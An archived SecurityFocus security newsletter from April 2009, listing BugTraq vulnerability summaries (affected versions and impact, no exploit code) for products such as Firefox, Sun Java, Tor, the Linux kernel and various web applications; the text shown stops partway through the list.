SecurityFocus News
SecurityFocus Newsletter #498 Apr 09 2009 10:39PM
sfa securityfocus com
SecurityFocus Newsletter #498
----------------------------------------

This issue is sponsored by Red Hat

Putting open source to the test:The making of JBoss Enterprise Middleware

Through a rigorous productization process, JBoss Enterprise Middleware teams continually harden and transform cutting-edge open source technology into well-tempered enterprise software products with unsurpassed quality, performance, and stability - then deliver it with top-notch support and mission-critical SLAs. Here's how it's done.

http://dinclinx.com/Redirect.aspx?36;4756;20;189;0;1;259;ac28cb88c17443b
5

SECURITY BLOGS
SecurityFocus has selected a few syndicated sources that stand out as conveying topics of interest for our community. We are proud to offer content from Matasano at this time and will be adding more in the coming weeks.
http://www.securityfocus.com/blogs

------------------------------------------------------------------
I. FRONT AND CENTER
1. Facebook, Privacy and Contracts
2. Act Locally, Pwn Globally
II. BUGTRAQ SUMMARY
1. Geeklog 'SEC_authenticate()' SQL Injection Vulnerability
2. glFusion 'SESS_updateSessionTime()' SQL Injection Vulnerability
3. Mozilla Firefox/SeaMonkey UTF-8 Stack-Based Buffer Overflow Vulnerability
4. Mozilla Firefox/Thunderbird/Seamokey Arbitrary Image Cross Domain Security Bypass Vulnerability
5. Mozilla Firefox URI Splitting Security Bypass Vulnerability
6. Mozilla Firefox/Thunderbird/SeaMonkey Multiple Remote Vulnerabilities
7. Mozilla Firefox CSSValue Array Data Structure Remote Code Execution Vulnerability
8. Mozilla Firefox '.url' Shortcut Processing Information Disclosure Vulnerability
9. Mozilla Firefox Mac OS X GIF Rendering Memory Corruption Vulnerability
10. Sun Java System Access Manager Username Enumeration Weakness
11. Sun Java System Identity Manager Multiple Vulnerabilities
12. Sun Solaris 'xscreensaver(1)' Information Disclosure Vulnerability
13. Photo-Graffix 'wmprocess.php' Local File Include Vulnerability
14. Photo-Graffix 'mp3upload.htm' Arbitrary File Upload Vulnerability
15. ClamAV Multiple Remote Denial of Service Vulnerabilities
16. Little CMS Memory Leak and Multiple Memory Corruption Vulnerabilities
17. Sun Java Applet Font.createFont Remote Denial Of Service Vulnerability
18. Sun Java Web Start and Java Plug-in JAR File Privilege Escalation Vulnerability
19. Sun Java Runtime Environment and Java Development Kit Multiple Security Vulnerabilities
20. Sun Java Web Start and Java Plug-in Multiple Privilege Escalation Vulnerabilities
21. pam-krb5 Local Privilege Escalation Vulnerability
22. pam-krb5 'KRB5CCNAME' Environment Variable Local Privilege Escalation Vulnerability
23. CF Shopkart 'index.cfm' SQL Injection Vulnerability
24. Q2 Solutions ConnX 'frmLoginPwdReminderPopup.aspx' SQL Injection Vulnerability
25. Pixie CMS SQL Injection and Cross Site Scripting Vulnerabilities
26. PPLive URI Handlers 'LoadModule' Parameter Multiple Remote Code Execution Vulnerabilities
27. NetworkManager Permission Enforcement Multiple Local Vulnrabilities
28. Wireshark Prior to 1.0.7 Multiple Denial Of Service Vulnerabilities
29. XBMC Multiple Remote Buffer Overflow Vulnerabilities
30. Wireshark PN-DCP Data Format String Vulnerability
31. multipath-tools 'multipathd' Local Denial of Service Vulnerability
32. net2ftp Multiple Cross-Site Scripting Vulnerabilities
33. Tor Unspecified Remote Memory Corruption Vulnerability
34. Tor Multiple Denial of Service Vulnerabilities
35. Tor Security Bypass And Privilege Escalation Weaknesses
36. Ots Labs OtsTurntables OFL File Buffer Overflow Vulnerability
37. AdaptBB Multiple Input Validation Vulnerabilities
38. Linux Kernel CIFS Remote Buffer Overflow Vulnerability
39. Maian Music Joomla! Component 'category' Parameter SQL Injection Vulnerability
40. Cisco Subscriber Edge Services Manager Cross Site Scripting And HTML Injection Vulnerabilities
41. Linksys WRT160N Wireless Router Cross-Site Request Forgery Vulnerability
42. HP ProCurve Manager and ProCurve Manager Plus Unauthorized Access Vulnerability
43. Cisco Unified Communications Manager SIP Service Multiple Denial of Service Vulnerabilities
44. Sun Java Runtime Environment and Java Development Kit Multiple Security Vulnerabilities
45. Microsoft April 2009 Advance Notification Multiple Vulnerabilities
46. ClamAV Prior to 0.95.1 Multiple Remote Denial of Service Vulnerabilities
47. Ghostscript 'jbig2dec' JBIG2 Processing Buffer Overflow Vulnerability
48. IBM Lotus Domino IMAP Server Remote Denial of Service Vulnerability
49. MIT Kerberos 'NegTokenInit' Token Handling Remote Denial Of Service Vulnerability
50. IBM Tivoli Storage Manager Multiple Vulnerabilities
51. MIT Kerberos SPNEGO and ASN.1 Multiple Remote Denial Of Service Vulnerabilities
52. MIT Kerberos 'asn1_decode_generaltime()' Uninitialized Pointer Memory Corruption Vulnerability
53. InnerMedia DynaZip ZIP Archive Handling Multiple Buffer Overflow Vulnerabilities
54. OpenSSL Multiple Vulnerabilities
55. ejabberd MUC Logs Cross Site Scripting Vulnerability
56. Avahi 'avahi-core/server.c' Multicast DNS Denial Of Service Vulnerability
57. FFmpeg 'libavformat/4xm.c' Remote Code Execution Vulnerability
58. PHP 'imageRotate()' Uninitialized Memory Information Disclosure Vulnerability
59. Net-SNMP 'snmpUDPDomain.c' Remote Information Disclosure Vulnerability
60. Gretech GOM Player '.srt' File Remote Buffer Overflow Vulnerability
61. Joomla! 'com_mailto' Component 'article' Parameter SQL Injection Vulnerability
62. Joomla! cmimarketplace Component 'viewit' Parameter Directory Traversal Vulnerability
63. Horde Products Local File Include and Cross Site Scripting Vulnerabilities
64. Horde Turba 'services/obrowser/index.php' HTML Injection Vulnerability
65. Horde XSS Filter Cross Site Scripting Vulnerability
66. Linux Kernel 'exit_notify()' CAP_KILL Verification Local Privilege Escalation Vulnerability
67. Bugzilla 'attachment.cgi' Cross Site Request Forgery Vulnerability
68. LinPHA 1.3.4 Multiple Cross-Site Scripting Vulnerabilities
69. Xplode 'module_wrapper.asp' SQL Injection and Cross Site Scripting Vulnerabilities
70. Linux Kernel 'sock.c' SO_BSDCOMPAT Option Information Disclosure Vulnerability
71. Linux Kernel 'FWD-TSN' Chunk Remote Buffer Overflow Vulnerability
72. Linux Kernel 'seccomp' System Call Security Bypass Vulnerability
73. Linux Kernel '/ipc/shm.c' Local Denial of Service Vulnerability
74. Linux Kernel 'dell_rbu' Local Denial of Service Vulnerabilities
75. Linux Kernel Audit System 'audit_syscall_entry()' System Call Security Bypass Vulnerability
76. Linux Kernel Cloned Process 'CLONE_PARENT' Local Origin Validation Weakness
77. XIGLA Absolute Form Processor XE 'login.asp' SQL Injection Vulnerability
78. WebFileExplorer 'body.asp' SQL Injection Vulnerability
79. SWF Opener Buffer Overflow Vulnerability
80. BackendCMS 'main.asp' SQL Injection Vulnerability
81. EMC RepliStor Multiple Remote Heap Based Buffer Overflow Vulnerabilities
82. IBM BladeCenter Advanced Management Module Multiple Remote Vulnerabilities
83. Linux Kernel SPARC 'mremap()' Multiple Denial Of Service Vulnerabilities
84. Linux Kernel 'locks_remove_flock()' Local Race Condition Vulnerability
85. Linux Kernel 64 Bit ABI System Call Parameter Privilege Escalation Vulnerability
86. Apache Tomcat mod_jk Content Length Information Disclosure Vulnerability
87. Tunapie Stream URI Remote Command Execution Vulnerability
88. Tunapie Insecure Temporary File Creation Vulnerability
89. Lanius CMS 'upload.php' Arbitrary File Upload Vulnerability
90. Cisco PIX and ASA Multiple Denial of Service, ACL Bypass, and Authentication Bypass Vulnerabilities
91. SASPCMS SQL Injection and Cross Site Scripting Vulnerabilities
92. OpenGoo Cross Site Scripting And HTML Injection Vulnerabilities
93. OpenAFS Unix Cache Manager Heap-Based Buffer Overflow Vulnerability
94. OpenAFS Error Codes Remote Denial of Service Vulnerabiliy
95. RETIRED: vBulletin Admin Control Panel Multiple HTML Injection Vulnerabilities
96. Little CMS Monochrome Profiles Null Pointer Dereference Denial of Service Vulnerability
97. RETIRED: Little CMS Monochrome Profiles Null Pointer Dereference Denial of Service Vulnerability
98. OpenSSL PKCS Padding RSA Signature Forgery Vulnerability
99. Mozilla SeaMonkey/Thunderbird Newsgroup Cancel Message Handling Buffer Overflow Vulnerability
100. Mozilla Firefox 2.0.0.14 Multiple Remote Vulnerabilities
III. SECURITYFOCUS NEWS
1. Browsers bashed first in hacking contest
2. Experts: U.S. needs to defend its "cyber turf"
3. Advisor: U.S. needs policy to defend cyberspace
4. Cabal forms to fight Conficker, offers bounty
IV. SECURITY JOBS LIST SUMMARY
V. INCIDENTS LIST SUMMARY
VI. VULN-DEV RESEARCH LIST SUMMARY
VII. MICROSOFT FOCUS LIST SUMMARY
1. SecurityFocus Microsoft Newsletter #438
VIII. SUN FOCUS LIST SUMMARY
IX. LINUX FOCUS LIST SUMMARY
X. UNSUBSCRIBE INSTRUCTIONS
XI. SPONSOR INFORMATION

I. FRONT AND CENTER
---------------------
1. Facebook, Privacy and Contracts
On February 4, the social networking site Facebook made a minor change to its terms of service - the online contract that every user must agree to when they create an account.
Facebook was trying to solve a legitimate problem: People who deleted their accounts did not realize that information that they shared with other users would persist on their Facebook friends' accounts. Thus, they needed some way of telling users that the information might remain.
http://www.securityfocus.com/columnists/497

2. Act Locally, Pwn Globally
By Jeffrey Carr
On December 24, 2008, the Pakistani Whackerz Cr3w defaced a part of India's critical infrastructure, the Eastern Railway system Web site. The defacement appeared on a scroll feed which read: "Cyber war has been declared on Indian cyberspace by Whackerz- Pakistan (24 Dec-2008)."
http://www.securityfocus.com/columnists/496

II. BUGTRAQ SUMMARY
--------------------
1. Geeklog 'SEC_authenticate()' SQL Injection Vulnerability
BugTraq ID: 34456
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/34456
Summary:
Geeklog is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Geeklog 1.5.2 and earlier are vulnerable.

2. glFusion 'SESS_updateSessionTime()' SQL Injection Vulnerability
BugTraq ID: 34361
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/34361
Summary:
glFusion is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

This issue affects glFusion 1.1.2 and earlier. Note that it also affects Geeklog 1.5.2 and earlier.

3. Mozilla Firefox/SeaMonkey UTF-8 Stack-Based Buffer Overflow Vulnerability
BugTraq ID: 31397
Remote: Yes
Last Updated: 2009-04-08
Relevant URL: http://www.securityfocus.com/bid/31397
Summary:
Mozilla Firefox and SeaMonkey are prone to a stack-based buffer-overflow vulnerability.

An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.

Versions prior to Firefox 2.0.0.17 and prior to SeaMonkey 1.1.12 are vulnerable.

NOTE: This issue was originally documented in BID 31346 (Mozilla Firefox/SeaMonkey/Thunderbird Multiple Remote Vulnerabilities). It has been given its own record to better document the details.

4. Mozilla Firefox/Thunderbird/Seamokey Arbitrary Image Cross Domain Security Bypass Vulnerability
BugTraq ID: 32351
Remote: Yes
Last Updated: 2009-04-08
Relevant URL: http://www.securityfocus.com/bid/32351
Summary:
Mozilla Firefox, Thunderbird, and Seamonkey are prone to a cross-domain security-bypass vulnerability that can allow an attacker to bypass the same-origin policy.

The attacker can exploit this issue to access arbitrary images from other domains.

Versions prior to Firefox 2.0.0.18 are vulnerable.

NOTE: This issue was previously included in BID 32281 'Mozilla Firefox/Thunderbird/SeaMonkey Multiple Remote Vulnerabilities', but has been given its own record to better document the issue.

5. Mozilla Firefox URI Splitting Security Bypass Vulnerability
BugTraq ID: 30242
Remote: Yes
Last Updated: 2009-04-08
Relevant URL: http://www.securityfocus.com/bid/30242
Summary:
Mozilla Firefox is prone to a security-bypass vulnerability because of a design error.

Exploiting this issue could allow an attacker to bypass certain security restrictions and launch restricted URIs. Specifically, the attacker could use external applications to launch 'chrome:' URIs or to pass certain URIs to Firefox that would normally be handled by a vector application.

The issue affects Firefox 3.0 and versions prior to 2.0.0.16.

6. Mozilla Firefox/Thunderbird/SeaMonkey Multiple Remote Vulnerabilities
BugTraq ID: 32281
Remote: Yes
Last Updated: 2009-04-08
Relevant URL: http://www.securityfocus.com/bid/32281
Summary:
The Mozilla Foundation has released multiple security advisories specifying various vulnerabilities in Mozilla Firefox, Thunderbird, and SeaMonkey.

Exploiting these issues can allow attackers to:

- steal authentication credentials
- obtain potentially sensitive information
- violate the same-origin policy
- execute scripts with elevated privileges
- cause denial-of-service conditions
- execute arbitrary code

Other attacks are also possible.

These issues are present in the following applications:

Firefox 3.0.3 and prior
Firefox 2.0.0.17 and prior
Thunderbird: 2.0.0.17 and prior
SeaMonkey 1.1.12 and prior

7. Mozilla Firefox CSSValue Array Data Structure Remote Code Execution Vulnerability
BugTraq ID: 29802
Remote: Yes
Last Updated: 2009-04-08
Relevant URL: http://www.securityfocus.com/bid/29802
Summary:
Mozilla Firefox is prone to a remote code-execution vulnerability.

An attacker can exploit this issue to execute arbitrary code within the context of the affected application.

The issue affects Firefox 3.0 and versions prior to Firefox 2.0.0.16. Versions prior to Thunderbird 2.0.0.16 and prior to SeaMonkey 1.1.11 are also affected.

NOTE: Mozilla Thunderbird is affected by this issue only if JavaScript has been enabled in the application. This setting is disabled by default.

8. Mozilla Firefox '.url' Shortcut Processing Information Disclosure Vulnerability
BugTraq ID: 31747
Remote: Yes
Last Updated: 2009-04-08
Relevant URL: http://www.securityfocus.com/bid/31747
Summary:
Mozilla Firefox is prone to an information-disclosure vulnerability when processing '.url' shortcut files in HTML elements.

An attacker can exploit the issue to obtain sensitive information such as browser cache files, cookie data, or local filesystem details. Information harvested may aid in further attacks.

NOTE: To exploit this issue, the attacker must trick a victim into saving a malicious HTML file to the local system and then following a malicious URI.

Mozilla Firefox 3.0.1, 3.0.2, and 3.0.3 are reported vulnerable.

9. Mozilla Firefox Mac OS X GIF Rendering Memory Corruption Vulnerability
BugTraq ID: 30266
Remote: Yes
Last Updated: 2009-04-08
Relevant URL: http://www.securityfocus.com/bid/30266
Summary:
Mozilla Firefox for Mac OS X is prone to a memory-corruption vulnerability.

An attacker may exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will likely crash the application.

This issue affects Firefox 3.0.

10. Sun Java System Access Manager Username Enumeration Weakness
BugTraq ID: 33489
Remote: Yes
Last Updated: 2009-04-08
Relevant URL: http://www.securityfocus.com/bid/33489
Summary:
Sun Java System Access Manager is prone to a username-enumeration weakness because of a design error in the application when verifying user-supplied input.

Attackers may exploit this weakness to discern valid usernames. This may aid them in brute-force password cracking or other attacks.

This issue affects the following versions:

Sun Java System Access Manager 6 2005Q1 (6.3)
Sun Java System Access Manager 7 2005Q4 (7.0)
Sun Java System Access Manager 7.1

Sun OpenSSO is also reported vulnerable.

11. Sun Java System Identity Manager Multiple Vulnerabilities
BugTraq ID: 34191
Remote: Yes
Last Updated: 2009-04-08
Relevant URL: http://www.securityfocus.com/bid/34191
Summary:
Sun Java System Identity Manager is prone to multiple vulnerabilities, including information-disclosure issues, cross-site scripting issues, privilege-escalation issues, and a remote code-execution vulnerability.

Successful exploits may allow an attacker to obtain sensitive information, execute arbitrary script code in the browser of an unsuspecting user in the context of a site, perform unauthorized actions, or gain unauthorized access to the affected application. This may aid in the complete compromise of the computer. Other attacks are also possible.

These issues affect the following versions:

Sun Java System Identity Manager 7.0
Sun Java System Identity Manager 7.1
Sun Java System Identity Manager 7.1.1
Sun Java System Identity Manager 8.0

12. Sun Solaris 'xscreensaver(1)' Information Disclosure Vulnerability
BugTraq ID: 34421
Remote: No
Last Updated: 2009-04-08
Relevant URL: http://www.securityfocus.com/bid/34421
Summary:
Sun Solaris 'xscreensaver(1)' is prone to an information-disclosure vulnerability.

An attacker with local physical access to the console can exploit this issue to gain unauthorized access to certain information.

This issue affects Solaris 8. 9, 10 and OpenSolaris.

13. Photo-Graffix 'wmprocess.php' Local File Include Vulnerability
BugTraq ID: 34436
Remote: Yes
Last Updated: 2009-04-08
Relevant URL: http://www.securityfocus.com/bid/34436
Summary:
Photo-Graffix is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to view and execute arbitrary local files in the context of the webserver process. This may aid in further attacks.

Photo-Graffix 3.4 is vulnerable; other versions may also be affected.

14. Photo-Graffix 'mp3upload.htm' Arbitrary File Upload Vulnerability
BugTraq ID: 34434
Remote: Yes
Last Updated: 2009-04-08
Relevant URL: http://www.securityfocus.com/bid/34434
Summary:
Photo-Graffix is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.

An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.

Photo-Graffix 3.4 is vulnerable; other versions may also be affected.

15. ClamAV Multiple Remote Denial of Service Vulnerabilities
BugTraq ID: 34357
Remote: Yes
Last Updated: 2009-04-07
Relevant URL: http://www.securityfocus.com/bid/34357
Summary:
ClamAV is prone to multiple denial-of-service vulnerabilities when handling malformed files.

Successfully exploiting these issues allows remote attackers to deny service to legitimate users.

Versions prior to ClamAV 0.95 are vulnerable.

16. Little CMS Memory Leak and Multiple Memory Corruption Vulnerabilities
BugTraq ID: 34185
Remote: Yes
Last Updated: 2009-04-07
Relevant URL: http://www.securityfocus.com/bid/34185
Summary:
Little CMS is prone to a denial-of-service vulnerability and multiple memory-corruption vulnerabilities because it fails to perform adequate checks on user-supplied input.

Attackers may leverage these issues to execute arbitrary code in the context of the application or launch denial-of-service attacks.

Versions prior to Little CMS 1.18beta2 are vulnerable.

NOTE: Other applications that use Little CMS (such as Mozilla Firefox, OpenJDK, and GIMP) are vulnerable to these issues as well.

17. Sun Java Applet Font.createFont Remote Denial Of Service Vulnerability
BugTraq ID: 17981
Remote: Yes
Last Updated: 2009-04-07
Relevant URL: http://www.securityfocus.com/bid/17981
Summary:
Sun Java is prone to a remote denial-of-service vulnerability because the application fails to properly handle certain Java applets.

Successfully exploiting this issue will cause the application to create a temporary file that will grow in an unbounded fashion, consuming all available disk space. This will likely result in a denial-of-service condition.

Sun Java JDK 1.4.2_11 and 1.5.0_06 are vulnerable; other versions may also be affected.

18. Sun Java Web Start and Java Plug-in JAR File Privilege Escalation Vulnerability
BugTraq ID: 32892
Remote: Yes
Last Updated: 2009-04-07
Relevant URL: http://www.securityfocus.com/bid/32892
Summary:
Sun Java Web Start and Java Plug-in are prone to a privilege-escalation vulnerability.

This issue occurs when the affected applications parse a JAR file that is also a legitimate GIF image file.

An attacker may exploit this issue to obtain sensitive information (such as HTTP session cookies) or to perform actions as legitimate users of a web application. This may aid in further attacks.

NOTE: This issue was previously covered in BID 32620 (Sun Java Web Start and Java Plug-in Multiple Privilege Escalation Vulnerabilities), but has been given its own record to better document the issue.

The following versions are affected:

JDK and JRE 6 Update 10 and earlier
JDK and JRE 5.0 Update 16 and earlier
SDK and JRE 1.4.2_18 and earlier
SDK and JRE 1.3.1_23 and earlier

19. Sun Java Runtime Environment and Java Development Kit Multiple Security Vulnerabilities
BugTraq ID: 32608
Remote: Yes
Last Updated: 2009-04-07
Relevant URL: http://www.securityfocus.com/bid/32608
Summary:
Sun Java Runtime Environment and Java Development Kit are prone to multiple security vulnerabilities.

Successful exploits may allow attackers to violate the same-origin policy, obtain sensitive information, bypass security restrictions, run untrusted applets with elevated privileges, and cause denial-of-service conditions. This may result in a compromise of affected computers.

These issues affect versions *prior to* the following:

JDK and JRE 6 Update 11
JDK and JRE 5.0 Update 17
SDK and JRE 1.4.2_19
SDK and JRE 1.3.1_24

20. Sun Java Web Start and Java Plug-in Multiple Privilege Escalation Vulnerabilities
BugTraq ID: 32620
Remote: Yes
Last Updated: 2009-04-07
Relevant URL: http://www.securityfocus.com/bid/32620
Summary:
Sun Java Web Start and Java Plug-in are prone to multiple privilege-escalation vulnerabilities.

Successful exploits may allow attackers to violate the same-origin policy, obtain sensitive information, bypass security, or read, write, and execute arbitrary files in the context of the user running a vulnerable application. This may result in a compromise of the underlying system.

The following versions are affected:

JDK and JRE 6 Update 10 and earlier
JDK and JRE 5.0 Update 16 and earlier
SDK and JRE 1.4.2_18 and earlier
SDK and JRE 1.3.1_23 and earlier

21. pam-krb5 Local Privilege Escalation Vulnerability
BugTraq ID: 33740
Remote: No
Last Updated: 2009-04-07
Relevant URL: http://www.securityfocus.com/bid/33740
Summary:
The 'pam-krb5' library is prone to a local privilege-escalation vulnerability because it fails to properly handle setuid processes.

Local attackers may exploit this issue to gain elevated privileges, which may lead to a complete compromise of the system.

This issue affects pam-krb5 as shipped with Debian, Ubuntu, and Gentoo Linux releases; other versions may also be vulnerable.

22. pam-krb5 'KRB5CCNAME' Environment Variable Local Privilege Escalation Vulnerability
BugTraq ID: 33741
Remote: No
Last Updated: 2009-04-07
Relevant URL: http://www.securityfocus.com/bid/33741
Summary:
The 'pam-krb5' library is prone to a local privilege-escalation vulnerability because it fails to properly handle setuid processes.

A local attacker may exploit this to corrupt the credential cache. This may allow the attacker to gain elevated privileges or to create a denial-of-service condition.

Versions prior to pam-krb5 3.13 are vulnerable.

23. CF Shopkart 'index.cfm' SQL Injection Vulnerability
BugTraq ID: 32765
Remote: Yes
Last Updated: 2009-04-07
Relevant URL: http://www.securityfocus.com/bid/32765
Summary:
CF Shopkart is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

CF Shopkart 5.2.2 is vulnerable; other versions may also be affected.

24. Q2 Solutions ConnX 'frmLoginPwdReminderPopup.aspx' SQL Injection Vulnerability
BugTraq ID: 34350
Remote: Yes
Last Updated: 2009-04-07
Relevant URL: http://www.securityfocus.com/bid/34350
Summary:
Q2 Solutions ConnX is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

ConnX 4.0.20080606 is vulnerable; other versions may also be affected.

25. Pixie CMS SQL Injection and Cross Site Scripting Vulnerabilities
BugTraq ID: 34189
Remote: Yes
Last Updated: 2009-04-07
Relevant URL: http://www.securityfocus.com/bid/34189
Summary:
Pixie CMS is prone to multiple SQL-injection vulnerabilities and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

26. PPLive URI Handlers 'LoadModule' Parameter Multiple Remote Code Execution Vulnerabilities
BugTraq ID: 34128
Remote: Yes
Last Updated: 2009-04-07
Relevant URL: http://www.securityfocus.com/bid/34128
Summary:
PPLive is prone to multiple remote code-execution vulnerabilities because the application fails to sufficiently sanitize user-supplied input.

Exploiting these issues can allow an attacker to execute arbitrary code within the context of the affected application.

PPLive 1.9.21 is vulnerable; other versions may also be affected.

27. NetworkManager Permission Enforcement Multiple Local Vulnrabilities
BugTraq ID: 33966
Remote: No
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/33966
Summary:
NetworkManager is prone to multiple local vulnerabilities because the software fails to properly enforce permissions.

Local attackers can exploit these issue to perform dbus queries to view network connection passwords and pre-shared keys and to modify or delete network connections. Other attacks may also be possible.

28. Wireshark Prior to 1.0.7 Multiple Denial Of Service Vulnerabilities
BugTraq ID: 34457
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/34457
Summary:
Wireshark is prone to multiple denial-of-service vulnerabilities.

Exploiting these issues may allow attackers to crash the application, denying service to legitimate users. Attackers may be able to leverage some of these vulnerabilities to execute arbitrary code, but this has not been confirmed.

Versions prior to Wireshark 1.0.7 are vulnerable.

29. XBMC Multiple Remote Buffer Overflow Vulnerabilities
BugTraq ID: 34334
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/34334
Summary:
XBMC is prone to multiple buffer-overflow vulnerabilities that occur because the application fails to perform adequate boundary checks on user-supplied data.

Attackers can exploit these issues to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.

XBMC 8.10 Atlantis is vulnerable; other versions may also be affected.

30. Wireshark PN-DCP Data Format String Vulnerability
BugTraq ID: 34291
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/34291
Summary:
Wireshark is prone to a format-string vulnerability.

Attackers can leverage this issue to execute arbitrary code within the context of the vulnerable application. Failed attacks will likely cause denial-of-service conditions.

Wireshark 1.0.6 is vulnerable; other versions may also be affected.

31. multipath-tools 'multipathd' Local Denial of Service Vulnerability
BugTraq ID: 34410
Remote: No
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/34410
Summary:
The 'multipath-tools' module is prone to a local denial-of-service vulnerability. A local attacker can exploit this issue to disrupt access to storage devices and corrupt filesystem data.

32. net2ftp Multiple Cross-Site Scripting Vulnerabilities
BugTraq ID: 34440
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/34440
Summary:
The 'net2ftp' program is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker can exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

These issues affect net2ftp 0.98 and earlier.

33. Tor Unspecified Remote Memory Corruption Vulnerability
BugTraq ID: 33399
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/33399
Summary:
Tor is prone to a memory-corruption issue.

Successfully exploiting this issue may allow remote attackers to execute arbitrary code in the context of the user running the application. Failed exploit attempts will likely result in denial-of-service conditions.

This issue affects versions prior to Tor 0.2.0.33.

34. Tor Multiple Denial of Service Vulnerabilities
BugTraq ID: 33713
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/33713
Summary:
Tor is prone to multiple vulnerabilities.

Attackers can exploit these issues to cause denial-of-service conditions.

These issues affect versions prior to Tor 0.2.0.34.

35. Tor Security Bypass And Privilege Escalation Weaknesses
BugTraq ID: 32648
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/32648
Summary:
Tor is prone to multiple weaknesses that may allow attackers to exploit other vulnerabilities that facilitate privilege-escalation and security-bypass attacks.

These issues affect versions prior to Tor 0.2.0.32.

36. Ots Labs OtsTurntables OFL File Buffer Overflow Vulnerability
BugTraq ID: 33257
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/33257
Summary:
Ots Labs OtsTurntables is prone to a buffer-overflow vulnerability because it fails to properly bounds-check user-supplied input.

Attackers may be able to execute arbitrary machine code in the context of the affected application. Failed exploit attempts will likely result in denial-of-service conditions.

OtsTurntables 1.00.027 is vulnerable; other versions may also be affected.

37. AdaptBB Multiple Input Validation Vulnerabilities
BugTraq ID: 34452
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/34452
Summary:
AdaptBB is prone to multiple security vulnerabilities because it fails to adequately sanitize user-supplied input. These vulnerabilities include multiple SQL-injection issues, an arbitrary-file-upload issue, and an arbitrary-command-execution issue.

Exploiting these issues can allow an attacker to upload and execute arbitrary files, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Other attacks may also be possible.

AdaptBB 1.0 Beta is vulnerable; other versions may also be affected.

38. Linux Kernel CIFS Remote Buffer Overflow Vulnerability
BugTraq ID: 34453
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/34453
Summary:
The Linux Kernel is prone to a remote buffer-overflow vulnerability because the software fails to perform adequate boundary checks on user-supplied data.

An attacker can exploit this issue to execute arbitrary code with kernel-level privileges. Successfully exploiting this issue will result in the complete compromise of affected computers. Failed exploit attempts will result in a denial-of-service condition.

The issue affects Linux Kernel 2.6.29; other versions may also be vulnerable.

39. Maian Music Joomla! Component 'category' Parameter SQL Injection Vulnerability
BugTraq ID: 34432
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/34432
Summary:
The Maian Music component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Maian Music 1.2.1 is vulnerable; other versions may also be affected.

40. Cisco Subscriber Edge Services Manager Cross Site Scripting And HTML Injection Vulnerabilities
BugTraq ID: 34454
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/34454
Summary:
Cisco Subscriber Edge Services Manager is prone to an unspecified cross-site scripting vulnerability and an unspecified HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied data.

Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.

We don't know which versions of Subscriber Edge Services Manager are affected. We will update this BID as more information emerges.

41. Linksys WRT160N Wireless Router Cross-Site Request Forgery Vulnerability
BugTraq ID: 34448
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/34448
Summary:
The Linksys WRT160N wireless router is prone to a cross-site request-forgery vulnerability.

Successful exploits can run privileged commands on the affected device, including enabling remote access to the web administration interface. This may lead to further network-based attacks.

Linksys WRT160N running firmware 1.02.2 is vulnerable.

42. HP ProCurve Manager and ProCurve Manager Plus Unauthorized Access Vulnerability
BugTraq ID: 34451
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/34451
Summary:
HP ProCurve Manager and ProCurve Manager Plus are prone to an unspecified unauthorized-access vulnerability. Remote attackers may exploit this issue to gain unauthorized access to data.

The following are vulnerable:

ProCurve Manager 3.2 and earlier
